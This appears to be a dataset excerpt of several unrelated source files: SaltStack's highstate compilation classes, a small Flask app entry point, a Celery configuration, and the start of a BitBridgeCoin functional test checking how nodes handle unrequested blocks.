The BaseHighState is an abstract base class that is the foundation of
running a highstate, extend it and add a self.state object of type State.
When extending this class, please note that ``self.client`` and
``self.matcher`` should be instantiated and handled.
'''
def __init__(self, opts):
self.opts = self.__gen_opts(opts)
self.iorder = 10000
self.avail = self.__gather_avail()
self.serial = salt.payload.Serial(self.opts)
self.building_highstate = {}
def __gather_avail(self):
'''
Gather the lists of available sls data from the master
'''
avail = {}
for saltenv in self._get_envs():
avail[saltenv] = self.client.list_states(saltenv)
return avail
def __gen_opts(self, opts):
'''
The options used by the High State object are derived from options
on the minion and the master, or just the minion if the high state
call is entirely local.
'''
# If the state is intended to be applied locally, then the local opts
# should have all of the needed data, otherwise overwrite the local
# data items with data from the master
if 'local_state' in opts:
if opts['local_state']:
return opts
mopts = self.client.master_opts()
if not isinstance(mopts, dict):
# An error happened on the master
opts['renderer'] = 'yaml_jinja'
opts['failhard'] = False
opts['state_top'] = salt.utils.url.create('top.sls')
opts['nodegroups'] = {}
opts['file_roots'] = {'base': [syspaths.BASE_FILE_ROOTS_DIR]}
else:
opts['renderer'] = mopts['renderer']
opts['failhard'] = mopts.get('failhard', False)
if mopts['state_top'].startswith('salt://'):
opts['state_top'] = mopts['state_top']
elif mopts['state_top'].startswith('/'):
opts['state_top'] = salt.utils.url.create(mopts['state_top'][1:])
else:
opts['state_top'] = salt.utils.url.create(mopts['state_top'])
opts['nodegroups'] = mopts.get('nodegroups', {})
opts['state_auto_order'] = mopts.get(
'state_auto_order',
opts['state_auto_order'])
opts['file_roots'] = mopts['file_roots']
opts['state_events'] = mopts.get('state_events')
opts['state_aggregate'] = mopts.get('state_aggregate', opts.get('state_aggregate', False))
opts['jinja_lstrip_blocks'] = mopts.get('jinja_lstrip_blocks', False)
opts['jinja_trim_blocks'] = mopts.get('jinja_trim_blocks', False)
return opts
def _get_envs(self):
'''
Pull the file server environments out of the master options
'''
envs = set(['base'])
if 'file_roots' in self.opts:
envs.update(list(self.opts['file_roots']))
return envs.union(set(self.client.envs()))
def get_tops(self):
'''
Gather the top files
'''
tops = DefaultOrderedDict(list)
include = DefaultOrderedDict(list)
done = DefaultOrderedDict(list)
found = 0 # did we find any contents in the top files?
# Gather initial top files
if self.opts['environment']:
contents = self.client.cache_file(
self.opts['state_top'],
self.opts['environment']
)
if contents:
found = 1
tops[self.opts['environment']] = [
compile_template(
contents,
self.state.rend,
self.state.opts['renderer'],
saltenv=self.opts['environment']
)
]
else:
found = 0
for saltenv in self._get_envs():
contents = self.client.cache_file(
self.opts['state_top'],
saltenv
)
if contents:
found = found + 1
else:
log.debug('No contents loaded for env: {0}'.format(saltenv))
tops[saltenv].append(
compile_template(
contents,
self.state.rend,
self.state.opts['renderer'],
saltenv=saltenv
)
)
if found == 0:
log.error('No contents found in top file')
# Search initial top files for includes
for saltenv, ctops in six.iteritems(tops):
for ctop in ctops:
if 'include' not in ctop:
continue
for sls in ctop['include']:
include[saltenv].append(sls)
ctop.pop('include')
# Go through the includes and pull out the extra tops and add them
while include:
pops = []
for saltenv, states in six.iteritems(include):
pops.append(saltenv)
if not states:
continue
for sls_match in states:
for sls in fnmatch.filter(self.avail[saltenv], sls_match):
if sls in done[saltenv]:
continue
tops[saltenv].append(
compile_template(
self.client.get_state(
sls,
saltenv
).get('dest', False),
self.state.rend,
self.state.opts['renderer'],
saltenv=saltenv
)
)
done[saltenv].append(sls)
for saltenv in pops:
if saltenv in include:
include.pop(saltenv)
return tops
def merge_tops(self, tops):
'''
Cleanly merge the top files
'''
top = DefaultOrderedDict(OrderedDict)
for ctops in six.itervalues(tops):
for ctop in ctops:
for saltenv, targets in six.iteritems(ctop):
if saltenv == 'include':
continue
try:
for tgt in targets:
if tgt not in top[saltenv]:
top[saltenv][tgt] = ctop[saltenv][tgt]
continue
matches = []
states = set()
for comp in top[saltenv][tgt]:
if isinstance(comp, dict):
matches.append(comp)
if isinstance(comp, six.string_types):
states.add(comp)
top[saltenv][tgt] = matches
top[saltenv][tgt].extend(list(states))
except TypeError:
raise SaltRenderError('Unable to render top file. No targets found.')
return top
def verify_tops(self, tops):
'''
Verify the contents of the top file data
'''
errors = []
if not isinstance(tops, dict):
errors.append('Top data was not formed as a dict')
# No further checks will work, bail out
return errors
for saltenv, matches in six.iteritems(tops):
if saltenv == 'include':
continue
if not isinstance(saltenv, six.string_types):
errors.append(
'Environment {0} in top file is not formed as a '
'string'.format(saltenv)
)
if saltenv == '':
errors.append('Empty saltenv statement in top file')
if not isinstance(matches, dict):
errors.append(
'The top file matches for saltenv {0} are not '
'formatted as a dict'.format(saltenv)
)
for slsmods in six.itervalues(matches):
if not isinstance(slsmods, list):
errors.append('Malformed topfile (state declarations not '
'formed as a list)')
continue
for slsmod in slsmods:
if isinstance(slsmod, dict):
# This value is a match option
for val in six.itervalues(slsmod):
if not val:
errors.append(
'Improperly formatted top file matcher '
'in saltenv {0}: {1} file'.format(
slsmod,
val
)
)
elif isinstance(slsmod, six.string_types):
# This is a sls module
if not slsmod:
errors.append(
'Environment {0} contains an empty sls '
'index'.format(saltenv)
)
return errors
def get_top(self):
'''
Returns the high data derived from the top file
'''
tops = self.get_tops()
return self.merge_tops(tops)
def top_matches(self, top):
'''
Search through the top high data for matches and return the states
that this minion needs to execute.
Returns:
{'saltenv': ['state1', 'state2', ...]}
'''
matches = {}
# pylint: disable=cell-var-from-loop
for saltenv, body in six.iteritems(top):
if self.opts['environment']:
if saltenv != self.opts['environment']:
continue
for match, data in six.iteritems(body):
def _filter_matches(_match, _data, _opts):
if isinstance(_data, six.string_types):
_data = [_data]
if self.matcher.confirm_top(
_match,
_data,
_opts
):
if saltenv not in matches:
matches[saltenv] = []
for item in _data:
if 'subfilter' in item:
_tmpdata = item.pop('subfilter')
for match, data in six.iteritems(_tmpdata):
_filter_matches(match, data, _opts)
if isinstance(item, six.string_types):
matches[saltenv].append(item)
_filter_matches(match, data, self.opts['nodegroups'])
ext_matches = self.client.ext_nodes()
for saltenv in ext_matches:
if saltenv in matches:
matches[saltenv] = list(
set(ext_matches[saltenv]).union(matches[saltenv]))
else:
matches[saltenv] = ext_matches[saltenv]
# pylint: enable=cell-var-from-loop
return matches
def load_dynamic(self, matches):
'''
If autoload_dynamic_modules is True then automatically load the
dynamic modules
'''
if not self.opts['autoload_dynamic_modules']:
return
if self.opts.get('local', False):
syncd = self.state.functions['saltutil.sync_all'](list(matches),
refresh=False)
else:
syncd = self.state.functions['saltutil.sync_all'](list(matches),
refresh=False)
if syncd['grains']:
self.opts['grains'] = salt.loader.grains(self.opts)
self.state.opts['pillar'] = self.state._gather_pillar()
self.state.module_refresh()
def render_state(self, sls, saltenv, mods, matches, local=False):
'''
Render a state file and retrieve all of the include states
'''
errors = []
if not local:
state_data = self.client.get_state(sls, saltenv)
fn_ = state_data.get('dest', False)
else:
fn_ = sls
if not os.path.isfile(fn_):
errors.append(
'Specified SLS {0} on local filesystem cannot '
'be found.'.format(sls)
)
if not fn_:
errors.append(
'Specified SLS {0} in saltenv {1} is not '
'available on the salt master or through a configured '
'fileserver'.format(sls, saltenv)
)
state = None
try:
state = compile_template(
fn_, self.state.rend, self.state.opts['renderer'], saltenv,
sls, rendered_sls=mods
)
except SaltRenderError as exc:
msg = 'Rendering SLS \'{0}:{1}\' failed: {2}'.format(
saltenv, sls, exc
)
log.critical(msg)
errors.append(msg)
except Exception as exc:
msg = 'Rendering SLS {0} failed, render error: {1}'.format(
sls, exc
)
log.critical(
msg,
# Show the traceback if the debug logging level is enabled
exc_info_on_loglevel=logging.DEBUG
)
errors.append('{0}\n{1}'.format(msg, traceback.format_exc()))
try:
mods.add('{0}:{1}'.format(saltenv, sls))
except AttributeError:
pass
if state:
if not isinstance(state, dict):
errors.append(
'SLS {0} does not render to a dictionary'.format(sls)
)
else:
include = []
if 'include' in state:
if not isinstance(state['include'], list):
err = ('Include Declaration in SLS {0} is not formed '
'as a list'.format(sls))
errors.append(err)
else:
include = state.pop('include')
self._handle_extend(state, sls, saltenv, errors)
self._handle_exclude(state, sls, saltenv, errors)
self._handle_state_decls(state, sls, saltenv, errors)
for inc_sls in include:
# inc_sls may take the form of:
# 'sls.to.include' <- same as {<saltenv>: 'sls.to.include'}
# {<env_key>: 'sls.to.include'}
# {'_xenv': 'sls.to.resolve'}
xenv_key = '_xenv'
if isinstance(inc_sls, dict):
env_key, inc_sls = inc_sls.popitem()
else:
env_key = saltenv
if env_key not in self.avail:
msg = ('Nonexistent saltenv {0!r} found in include '
'of {1!r} within SLS \'{2}:{3}\''
.format(env_key, inc_sls, saltenv, sls))
log.error(msg)
errors.append(msg)
continue
if inc_sls.startswith('.'):
p_comps = sls.split('.')
if state_data.get('source', '').endswith('/init.sls'):
inc_sls = sls + inc_sls
else:
inc_sls = '.'.join(p_comps[:-1]) + inc_sls
if env_key != xenv_key:
# Resolve inc_sls in the specified environment
if env_key in matches or fnmatch.filter(self.avail[env_key], inc_sls):
resolved_envs = [env_key]
else:
resolved_envs = []
else:
# Resolve inc_sls in the subset of environment matches
resolved_envs = [
aenv for aenv in matches
if fnmatch.filter(self.avail[aenv], inc_sls)
]
# An include must be resolved to a single environment, or
# the include must exist in the current environment
if len(resolved_envs) == 1 or saltenv in resolved_envs:
# Match inc_sls against the available states in the
# resolved env, matching wildcards in the process. If
# there were no matches, then leave inc_sls as the
# target so that the next recursion of render_state
# will recognize the error.
sls_targets = fnmatch.filter(
self.avail[saltenv],
inc_sls
) or [inc_sls]
for sls_target in sls_targets:
r_env = resolved_envs[0] if len(resolved_envs) == 1 else saltenv
mod_tgt = '{0}:{1}'.format(r_env, sls_target)
if mod_tgt not in mods:
nstate, err = self.render_state(
sls_target,
r_env,
mods,
matches
)
if nstate:
self.merge_included_states(state, nstate, errors)
state.update(nstate)
if err:
errors.extend(err)
else:
msg = ''
if not resolved_envs:
msg = ('Unknown include: Specified SLS {0}: {1} is not available on the salt '
'master in saltenv(s): {2} '
).format(env_key,
inc_sls,
', '.join(matches) if env_key == xenv_key else env_key)
elif len(resolved_envs) > 1:
msg = ('Ambiguous include: Specified SLS {0}: {1} is available on the salt master '
'in multiple available saltenvs: {2}'
).format(env_key,
inc_sls,
', '.join(resolved_envs))
log.critical(msg)
errors.append(msg)
try:
self._handle_iorder(state)
except TypeError:
log.critical('Could not render SLS {0}. Syntax error detected.'.format(sls))
else:
state = {}
return state, errors
def _handle_iorder(self, state):
'''
Take a state and apply the iorder system
'''
if self.opts['state_auto_order']:
for name in state:
for s_dec in state[name]:
if not isinstance(s_dec, six.string_types):
# PyDSL OrderedDict?
continue
if not isinstance(state[name], dict):
# Include's or excludes as lists?
continue
if not isinstance(state[name][s_dec], list):
# Bad syntax, let the verify seq pick it up later on
continue
found = False
if s_dec.startswith('_'):
continue
for arg in state[name][s_dec]:
if isinstance(arg, dict):
if len(arg) > 0:
if next(six.iterkeys(arg)) == 'order':
found = True
if not found:
if not isinstance(state[name][s_dec], list):
# quite certainly a syntax error, managed elsewhere
continue
state[name][s_dec].append(
{'order': self.iorder}
)
self.iorder += 1
return state
def _handle_state_decls(self, state, sls, saltenv, errors):
'''
Add sls and saltenv components to the state
'''
for name in state:
if not isinstance(state[name], dict):
if name == '__extend__':
continue
if name == '__exclude__':
continue
if isinstance(state[name], six.string_types):
# Is this is a short state, it needs to be padded
if '.' in state[name]:
comps = state[name].split('.')
state[name] = {'__sls__': sls,
'__env__': saltenv,
comps[0]: [comps[1]]}
continue
errors.append(
'ID {0} in SLS {1} is not a dictionary'.format(name, sls)
)
continue
skeys = set()
for key in state[name]:
if key.startswith('_'):
continue
if not isinstance(state[name][key], list):
continue
if '.' in key:
comps = key.split('.')
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - source: salt://redis/redis.conf
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
'ID {0!r} in SLS {1!r} contains multiple state '
'declarations of the same type'.format(name, sls)
)
continue
state[name][comps[0]] = state[name].pop(key)
state[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
if '__sls__' not in state[name]:
state[name]['__sls__'] = sls
if '__env__' not in state[name]:
state[name]['__env__'] = saltenv
def _handle_extend(self, state, sls, saltenv, errors):
'''
Take the extend dec out of state and apply to the highstate global
dec
'''
if 'extend' in state:
ext = state.pop('extend')
if not isinstance(ext, dict):
errors.append(('Extension value in SLS {0!r} is not a '
'dictionary').format(sls))
return
for name in ext:
if not isinstance(ext[name], dict):
errors.append(('Extension name {0!r} in SLS {1!r} is '
'not a dictionary'
.format(name, sls)))
continue
if '__sls__' not in ext[name]:
ext[name]['__sls__'] = sls
if '__env__' not in ext[name]:
ext[name]['__env__'] = saltenv
for key in ext[name]:
if key.startswith('_'):
continue
if not isinstance(ext[name][key], list):
continue
if '.' in key:
comps = key.split('.')
ext[name][comps[0]] = ext[name].pop(key)
ext[name][comps[0]].append(comps[1])
state.setdefault('__extend__', []).append(ext)
def _handle_exclude(self, state, sls, saltenv, errors):
'''
Take the exclude dec out of the state and apply it to the highstate
global dec
'''
if 'exclude' in state:
exc = state.pop('exclude')
if not isinstance(exc, list):
err = ('Exclude Declaration in SLS {0} is not formed '
'as a list'.format(sls))
errors.append(err)
state.setdefault('__exclude__', []).extend(exc)
def render_highstate(self, matches):
'''
Gather the state files and render them into a single unified salt
high data structure.
'''
highstate = self.building_highstate
all_errors = []
mods = set()
statefiles = []
for saltenv, states in six.iteritems(matches):
for sls_match in states:
try:
statefiles = fnmatch.filter(self.avail[saltenv], sls_match)
except KeyError:
all_errors.extend(['No matching salt environment for environment {0!r} found'.format(saltenv)])
# if we did not found any sls in the fileserver listing, this
# may be because the sls was generated or added later, we can
# try to directly execute it, and if it fails, anyway it will
# return the former error
if not statefiles:
statefiles = [sls_match]
for sls in statefiles:
r_env = '{0}:{1}'.format(saltenv, sls)
if r_env in mods:
continue
state, errors = self.render_state(
sls, saltenv, mods, matches)
if state:
self.merge_included_states(highstate, state, errors)
for i, error in enumerate(errors[:]):
if 'is not available' in error:
# match SLS foobar in environment
this_sls = 'SLS {0} in saltenv'.format(
sls_match)
if this_sls in error:
errors[i] = (
'No matching sls found for {0!r} '
'in env {1!r}'.format(sls_match, saltenv))
all_errors.extend(errors)
self.clean_duplicate_extends(highstate)
return highstate, all_errors
def clean_duplicate_extends(self, highstate):
if '__extend__' in highstate:
highext = []
for items in (six.iteritems(ext) for ext in highstate['__extend__']):
for item in items:
if item not in highext:
highext.append(item)
highstate['__extend__'] = [{t[0]: t[1]} for t in highext]
def merge_included_states(self, highstate, state, errors):
# The extend members can not be treated as globally unique:
if '__extend__' in state:
highstate.setdefault('__extend__',
[]).extend(state.pop('__extend__'))
if '__exclude__' in state:
highstate.setdefault('__exclude__',
[]).extend(state.pop('__exclude__'))
for id_ in state:
if id_ in highstate:
if highstate[id_] != state[id_]:
errors.append((
'Detected conflicting IDs, SLS'
' IDs need to be globally unique.\n The'
' conflicting ID is {0!r} and is found in SLS'
' \'{1}:{2}\' and SLS \'{3}:{4}\'').format(
id_,
highstate[id_]['__env__'],
highstate[id_]['__sls__'],
state[id_]['__env__'],
state[id_]['__sls__'])
)
try:
highstate.update(state)
except ValueError:
errors.append(
'Error when rendering state with contents: {0}'.format(state)
)
def _check_pillar(self, force=False):
'''
Check the pillar for errors, refuse to run the state if there are
errors in the pillar and return the pillar errors
'''
if force:
return True
if '_errors' in self.state.opts['pillar']:
return False
return True
def matches_whitelist(self, matches, whitelist):
'''
Reads over the matches and returns a matches dict with just the ones
that are in the whitelist
'''
if not whitelist:
return matches
ret_matches = {}
if not isinstance(whitelist, list):
whitelist = whitelist.split(',')
for env in matches:
for sls in matches[env]:
if sls in whitelist:
ret_matches[env] = ret_matches[env] if env in ret_matches else []
ret_matches[env].append(sls)
return ret_matches
def call_highstate(self, exclude=None, cache=None, cache_name='highstate',
force=False, whitelist=None):
'''
Run the sequence to execute the salt highstate for this minion
'''
# Check that top file exists
tag_name = 'no_|-states_|-states_|-None'
ret = {tag_name: {
'result': False,
'comment': 'No states found for this minion',
'name': 'No States',
'changes': {},
'__run_num__': 0,
}}
cfn = os.path.join(
self.opts['cachedir'],
'{0}.cache.p'.format(cache_name)
)
if cache:
if os.path.isfile(cfn):
with salt.utils.fopen(cfn, 'rb') as fp_:
high = self.serial.load(fp_)
return self.state.call_high(high)
# File exists so continue
err = []
try:
top = self.get_top()
except SaltRenderError as err:
ret[tag_name]['comment'] = 'Unable to render top file: '
ret[tag_name]['comment'] += err.error
return ret
except Exception:
trb = traceback.format_exc()
err.append(trb)
return err
err += self.verify_tops(top)
matches = self.top_matches(top)
if not matches:
msg = ('No Top file or external nodes data matches found')
ret[tag_name]['comment'] = msg
return ret
matches = self.matches_whitelist(matches, whitelist)
self.load_dynamic(matches)
if not self._check_pillar(force):
err += ['Pillar failed to render with the following messages:']
err += self.state.opts['pillar']['_errors']
else:
high, errors = self.render_highstate(matches)
if exclude:
if isinstance(exclude, str):
exclude = exclude.split(',')
if '__exclude__' in high:
high['__exclude__'].extend(exclude)
else:
high['__exclude__'] = exclude
err += errors
if err:
return err
if not high:
return ret
cumask = os.umask(0o77)
try:
if salt.utils.is_windows():
# Make sure cache file isn't read-only
self.state.functions['cmd.run']('attrib -R "{0}"'.format(cfn), output_loglevel='quiet')
with salt.utils.fopen(cfn, 'w+b') as fp_:
try:
self.serial.dump(high, fp_)
except TypeError:
# Can't serialize pydsl
pass
except (IOError, OSError):
msg = 'Unable to write to "state.highstate" cache file {0}'
log.error(msg.format(cfn))
os.umask(cumask)
return self.state.call_high(high)
def compile_highstate(self):
'''
Return just the highstate or the errors
'''
err = []
top = self.get_top()
err += self.verify_tops(top)
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
err += errors
if err:
return err
return high
def compile_low_chunks(self):
'''
Compile the highstate but don't run it, return the low chunks to
see exactly what the highstate will execute
'''
top = self.get_top()
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
# If there is extension data reconcile it
high, ext_errors = self.state.reconcile_extend(high)
errors += ext_errors
# Verify that the high data is structurally sound
errors += self.state.verify_high(high)
high, req_in_errors = self.state.requisite_in(high)
errors += req_in_errors
high = self.state.apply_exclude(high)
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.state.compile_high_data(high)
return chunks
class HighState(BaseHighState):
'''
Generate and execute the salt "High State". The High State is the
compound state derived from a group of template files stored on the
salt master or in the local cache.
'''
# a stack of active HighState objects during a state.highstate run
stack = []
def __init__(self, opts, pillar=None, jid=None):
self.opts = opts
self.client = salt.fileclient.get_file_client(self.opts)
BaseHighState.__init__(self, opts)
self.state = State(self.opts, pillar, jid)
self.matcher = salt.minion.Matcher(self.opts)
# tracks all pydsl state declarations globally across sls files
self._pydsl_all_decls = {}
# a stack of current rendering Sls objects, maintained and used by the pydsl renderer.
self._pydsl_render_stack = []
def push_active(self):
self.stack.append(self)
@classmethod
def clear_active(cls):
# Nuclear option
#
# Blow away the entire stack. Used primarily by the test runner but also
# useful in custom wrappers of the HighState class, to reset the stack
# to a fresh state.
cls.stack = []
@classmethod
def pop_active(cls):
cls.stack.pop()
@classmethod
def get_active(cls):
try:
return cls.stack[-1]
except IndexError:
return None
class MasterState(State):
'''
Create a State object for master side compiling
'''
def __init__(self, opts, minion):
State.__init__(self, opts)
def load_modules(self, data=None):
'''
Load the modules into the state
'''
log.info('Loading fresh modules for state activity')
# Load a modified client interface that looks like the interface used
# from the minion, but uses remote execution
#
self.functions = salt.client.FunctionWrapper(
self.opts,
self.opts['id']
)
# Load the states, but they should not be used in this class apart
# from inspection
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions, states=self.states)
class MasterHighState(HighState):
'''
Execute highstate compilation from the master
'''
def __init__(self, master_opts, minion_opts, grains, id_,
saltenv=None,
env=None):
if isinstance(env, six.string_types):
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt '
'Boron.'
)
# Backwards compatibility
saltenv = env
# Force the fileclient to be local
opts = copy.deepcopy(minion_opts)
opts['file_client'] = 'local'
opts['file_roots'] = master_opts['master_roots']
opts['renderer'] = master_opts['renderer']
opts['state_top'] = master_opts['state_top']
opts['id'] = id_
opts['grains'] = grains
HighState.__init__(self, opts)
class RemoteHighState(object):
'''
Manage gathering the data from the master
'''
def __init__(self, opts, grains):
self.opts = opts
self.grains = grains
self.serial = salt.payload.Serial(self.opts)
# self.auth = salt.crypt.SAuth(opts)
self.channel = salt.transport.Channel.factory(self.opts['master_uri'])
def compile_master(self):
'''
Return the state data from the master
'''
load = {'grains': self.grains,
'opts': self.opts,
'cmd': '_master_state'}
try:
return self.channel.send(load, tries=3, timeout=72000)
except SaltReqTimeoutError:
return {}
| 42.408878
| 132
| 0.431081
|
4a04cb21c4bb5e8110cd9f795e680719f32470db
| 426
|
py
|
Python
|
microblog.py
|
Colton21/fat_logbook
|
059d58ee1218aff72d90aa463d4ddf5fd9379df6
|
[
"MIT"
] | null | null | null |
microblog.py
|
Colton21/fat_logbook
|
059d58ee1218aff72d90aa463d4ddf5fd9379df6
|
[
"MIT"
] | null | null | null |
microblog.py
|
Colton21/fat_logbook
|
059d58ee1218aff72d90aa463d4ddf5fd9379df6
|
[
"MIT"
] | null | null | null |
from app import create_app, db, cli
from app.models import User, Post, Message, Notification, Task, StartShiftPost, EndShiftPost
app = create_app()
cli.register(app)
@app.shell_context_processor
def make_shell_context():
return {'db': db, 'User': User, 'Post': Post, 'Message': Message,
'Notification': Notification, 'Task': Task, 'StartShiftPost': StartShiftPost,
'EndShiftPost': EndShiftPost}
| 32.769231
| 92
| 0.70892
|
4a04cb24a8fecf1f76c6104ba56a84cdc1610df8
| 571
|
py
|
Python
|
config/celery_app.py
|
4kumax/lev
|
83f5f42c9a487875f4e77f0d45cab24ffd6eb52a
|
[
"MIT"
] | null | null | null |
config/celery_app.py
|
4kumax/lev
|
83f5f42c9a487875f4e77f0d45cab24ffd6eb52a
|
[
"MIT"
] | null | null | null |
config/celery_app.py
|
4kumax/lev
|
83f5f42c9a487875f4e77f0d45cab24ffd6eb52a
|
[
"MIT"
] | null | null | null |
import os
from celery import Celery
# set the default Django settings module for the 'celery' program.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.local")
app = Celery("levgit")
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
app.config_from_object("django.conf:settings", namespace="CELERY")
# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
| 31.722222
| 72
| 0.781086
|
4a04ccc17123153de649d1674e34e0e8761a4169
| 10,074
|
py
|
Python
|
test/functional/p2p-acceptblock.py
|
BitBridgeCoin/BitBridgeCoin
|
7d4d78472bf9dbfd6458498cdef78954796674da
|
[
"MIT"
] | 4
|
2021-04-07T15:12:54.000Z
|
2021-06-14T01:43:35.000Z
|
test/functional/p2p-acceptblock.py
|
BitBridgeCoin/BitBridgeCoin
|
7d4d78472bf9dbfd6458498cdef78954796674da
|
[
"MIT"
] | null | null | null |
test/functional/p2p-acceptblock.py
|
BitBridgeCoin/BitBridgeCoin
|
7d4d78472bf9dbfd6458498cdef78954796674da
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The BitBridgeCoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test processing of unrequested blocks.
Since behavior differs when receiving unrequested blocks from whitelisted peers
versus non-whitelisted peers, this tests the behavior of both (effectively two
separate tests running in parallel).
Setup: two nodes, node0 and node1, not connected to each other. Node0 does not
whitelist localhost, but node1 does. They will each be on their own chain for
this test.
We have one NodeConn connection to each, test_node and white_node respectively.
The test:
1. Generate one block on each node, to leave IBD.
2. Mine a new block on each tip, and deliver to each node from node's peer.
The tip should advance.
3. Mine a block that forks the previous block, and deliver to each node from
corresponding peer.
Node0 should not process this block (just accept the header), because it is
unrequested and doesn't have more work than the tip.
Node1 should process because this is coming from a whitelisted peer.
4. Send another block that builds on the forking block.
Node0 should process this block but be stuck on the shorter chain, because
it's missing an intermediate block.
Node1 should reorg to this longer chain.
4b.Send 288 more blocks on the longer chain.
Node0 should process all but the last block (too far ahead in height).
Send all headers to Node1, and then send the last block in that chain.
Node1 should accept the block because it's coming from a whitelisted peer.
5. Send a duplicate of the block in #3 to Node0.
Node0 should not process the block because it is unrequested, and stay on
the shorter chain.
6. Send Node0 an inv for the height 3 block produced in #4 above.
Node0 should figure out that Node0 has the missing height 2 block and send a
getdata.
7. Send Node0 the missing block again.
Node0 should process and the tip should advance.
"""
from test_framework.mininode import *
from test_framework.test_framework import BitBridgeCoinTestFramework
from test_framework.util import *
import time
from test_framework.blocktools import create_block, create_coinbase
class AcceptBlockTest(BitBridgeCoinTestFramework):
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("BITCOIND", "bitbridgecoind"),
help="bitbridgecoind binary to test")
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 2
self.extra_args = [[], ["-whitelist=127.0.0.1"]]
def setup_network(self):
# Node0 will be used to test behavior of processing unrequested blocks
# from peers which are not whitelisted, while Node1 will be used for
# the whitelisted case.
self.setup_nodes()
def run_test(self):
# Setup the p2p connections and start up the network thread.
test_node = NodeConnCB() # connects to node0 (not whitelisted)
white_node = NodeConnCB() # connects to node1 (whitelisted)
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_node))
connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1], white_node))
test_node.add_connection(connections[0])
white_node.add_connection(connections[1])
NetworkThread().start() # Start up network handling in another thread
# Test logic begins here
test_node.wait_for_verack()
white_node.wait_for_verack()
# 1. Have both nodes mine a block (leave IBD)
[ n.generate(1) for n in self.nodes ]
tips = [ int("0x" + n.getbestblockhash(), 0) for n in self.nodes ]
# 2. Send one block that builds on each tip.
# This should be accepted.
blocks_h2 = [] # the height 2 blocks on each node's chain
block_time = int(time.time()) + 1
for i in range(2):
blocks_h2.append(create_block(tips[i], create_coinbase(2), block_time))
blocks_h2[i].solve()
block_time += 1
test_node.send_message(msg_block(blocks_h2[0]))
white_node.send_message(msg_block(blocks_h2[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
assert_equal(self.nodes[0].getblockcount(), 2)
assert_equal(self.nodes[1].getblockcount(), 2)
self.log.info("First height 2 block accepted by both nodes")
# 3. Send another block that builds on the original tip.
blocks_h2f = [] # Blocks at height 2 that fork off the main chain
for i in range(2):
blocks_h2f.append(create_block(tips[i], create_coinbase(2), blocks_h2[i].nTime+1))
blocks_h2f[i].solve()
test_node.send_message(msg_block(blocks_h2f[0]))
white_node.send_message(msg_block(blocks_h2f[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
for x in self.nodes[0].getchaintips():
if x['hash'] == blocks_h2f[0].hash:
assert_equal(x['status'], "headers-only")
for x in self.nodes[1].getchaintips():
if x['hash'] == blocks_h2f[1].hash:
assert_equal(x['status'], "valid-headers")
self.log.info("Second height 2 block accepted only from whitelisted peer")
# 4. Now send another block that builds on the forking chain.
blocks_h3 = []
for i in range(2):
blocks_h3.append(create_block(blocks_h2f[i].sha256, create_coinbase(3), blocks_h2f[i].nTime+1))
blocks_h3[i].solve()
test_node.send_message(msg_block(blocks_h3[0]))
white_node.send_message(msg_block(blocks_h3[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
# Since the earlier block was not processed by node0, the new block
# can't be fully validated.
for x in self.nodes[0].getchaintips():
if x['hash'] == blocks_h3[0].hash:
assert_equal(x['status'], "headers-only")
# But this block should be accepted by node0 since it has more work.
self.nodes[0].getblock(blocks_h3[0].hash)
self.log.info("Unrequested more-work block accepted from non-whitelisted peer")
# Node1 should have accepted and reorged.
assert_equal(self.nodes[1].getblockcount(), 3)
self.log.info("Successfully reorged to length 3 chain from whitelisted peer")
# 4b. Now mine 288 more blocks and deliver; all should be processed but
# the last (height-too-high) on node0. Node1 should process the tip if
# we give it the headers chain leading to the tip.
tips = blocks_h3
headers_message = msg_headers()
all_blocks = [] # node0's blocks
for j in range(2):
for i in range(288):
next_block = create_block(tips[j].sha256, create_coinbase(i + 4), tips[j].nTime+1)
next_block.solve()
if j==0:
test_node.send_message(msg_block(next_block))
all_blocks.append(next_block)
else:
headers_message.headers.append(CBlockHeader(next_block))
tips[j] = next_block
time.sleep(2)
# Blocks 1-287 should be accepted, block 288 should be ignored because it's too far ahead
for x in all_blocks[:-1]:
self.nodes[0].getblock(x.hash)
assert_raises_jsonrpc(-1, "Block not found on disk", self.nodes[0].getblock, all_blocks[-1].hash)
headers_message.headers.pop() # Ensure the last block is unrequested
white_node.send_message(headers_message) # Send headers leading to tip
white_node.send_message(msg_block(tips[1])) # Now deliver the tip
white_node.sync_with_ping()
self.nodes[1].getblock(tips[1].hash)
self.log.info("Unrequested block far ahead of tip accepted from whitelisted peer")
# 5. Test handling of unrequested block on the node that didn't process
# Should still not be processed (even though it has a child that has more
# work).
test_node.send_message(msg_block(blocks_h2f[0]))
# Here, if the sleep is too short, the test could falsely succeed (if the
# node hasn't processed the block by the time the sleep returns, and then
# the node processes it and incorrectly advances the tip).
# But this would be caught later on, when we verify that an inv triggers
# a getdata request for this block.
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 2)
self.log.info("Unrequested block that would complete more-work chain was ignored")
# 6. Try to get node to request the missing block.
# Poke the node with an inv for block at height 3 and see if that
# triggers a getdata on block 2 (it should if block 2 is missing).
with mininode_lock:
# Clear state so we can check the getdata request
